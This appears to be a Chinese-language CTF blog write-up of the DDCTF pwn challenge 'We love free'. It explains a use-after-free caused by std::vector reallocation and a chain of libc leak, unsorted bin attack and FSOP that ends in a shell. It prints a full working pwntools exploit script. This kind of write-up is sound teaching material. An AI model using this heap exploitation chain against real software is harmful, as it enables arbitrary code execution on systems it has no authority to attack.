DDCTF-PWN

字数统计: 737字   |   阅读时长≈ 3分

C++一直都没有深入学习过,以后还是要抽时间看看(尽量不鸽,感觉想学的东西太多了)。就一道pwn题,而且是基于C++,花了一点时间学习 vector是啥。

We love free

程序提示使用了 VectorVector是一个动态大小的数组容器,可以根据用户的输入,动态的增大缓存。vector 的扩容规则是1,2,4,8,16,32,依次乘2个元素的时候会先申请新的空间,在把原来的数据拷贝到新申请的空间中,在释放原先的空间,对应申请的堆块大小(加上头部)0x20,0x20,0x30,0x50,0x90…..

Vector有一个结构体:

1
2
3
4
5
Vector_struct{
	start_addr;
	cur_addr;
	end_addr;
}

程序分析

image-20201016171205010

Show函数中,会先向 Vector中存入一个 0xAABBCCDD的值,这个值可能会使Vector扩容,导致初始时得到的堆块首地址是旧堆块的地址。 存在一个 Edit功能,使用的是旧堆块的地址,但是size却是扩容后的新堆块的size ,这就导致了 UAF漏洞。

利用分析

  1. 泄露libc地址

先存入 16个数据,此时Vector大小为 0x90。再调用 Show函数,会先存入 0xAABBCCDD的值,导致堆块扩容到 0x110,原有堆块则会被放入 unsortedbin中,然后即可将 libc地址泄露出来。调用 clear,将所有堆块释放。

  1. unsotedbin attack

先在heap中布上 0x20 个 one_gadget地址,随后调用 clear将所有堆块释放。随后申请 16 个数据,再调用 Show函数,使用 Edit功能修改 unsortedbinbk指针指到 stdin@GLIBC-0x8的位置,并且修改新申请的 chunksize,将其改小。这样调用 clear函数时,我们修改的unsortedbin就不会被合并。

  1. 触发FSOP

然后就是再 输入 9个数据,Vector就会扩容到 0x90,也就是触发了 unsortedbin attack。此时 std::cin@GLIBC的值被改为了一个 Heap地址,然后再后面在执行 std::cin时就会触发FSOP 。我们再通过触发 stdin就能够 getshell

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug = 1
if debug == 1:
    p = process('./pwn1')
    elf = ELF('./pwn1')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

stdin = 0x6051f8
gadgets = [0x45226,0x4527a,0xf0364,0xf67b0]
def menu(idx):
    p.recvuntil(">>")
    p.sendline(str(idx))
def add(content):
    menu(1)
    p.recvuntil("num:")
    p.sendline(str(content))

def show():
    menu(2)

def clear():
    menu(3)

def pwn():
    for i in range(16):
        add(0xcafebabedeadbeef)
    #gdb.attach(p, 'bp 0x4011aa')
    show()
    p.recvuntil("1:")
    libc_base = int(p.recvuntil('\n')[:-1]) - 0x3c4b78
    print 'libc_base:',hex(libc_base)

    gadget = gadgets[3]+libc_base
    print 'gadget:',hex(gadget)
    for i in range(34):
        p.recvuntil("(y/n):")
        p.send('n')
    clear()

    for i in range(0x10):
        add(libc.address)
    clear()

    print "===============> puts gadget"
    for i in range(0x21):
        add(gadget)
    clear()

    #unsortedbin attack
    for i in range(0x10):
        add(gadget)
    show()
    print "===============> edit stdout@glibc"
    #gdb.attach(p, 'bp $rebase(0x40128f)')
    p.recvuntil('Edit (y/n):')
    p.sendline('n')
    p.recvuntil('Edit (y/n):')
    p.sendline('y')
    #payload = p32(stdin-0x10)
    p.sendline(str(stdin-0x10))

    for i in range(32):
        p.recvuntil("(y/n):")
        p.send('y')
        p.sendline(str(0x71))
    clear() 
    print "=========== get shell"
    for i in range(9):
        print i
        add(0xcafebabedeadbeef)

    p.interactive()

pwn()

只要你支持她,我们就是好朋友2333

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要研究:
二进制安全、漏洞挖掘
CTF菜鸡一只

天枢Dubhe 学习ing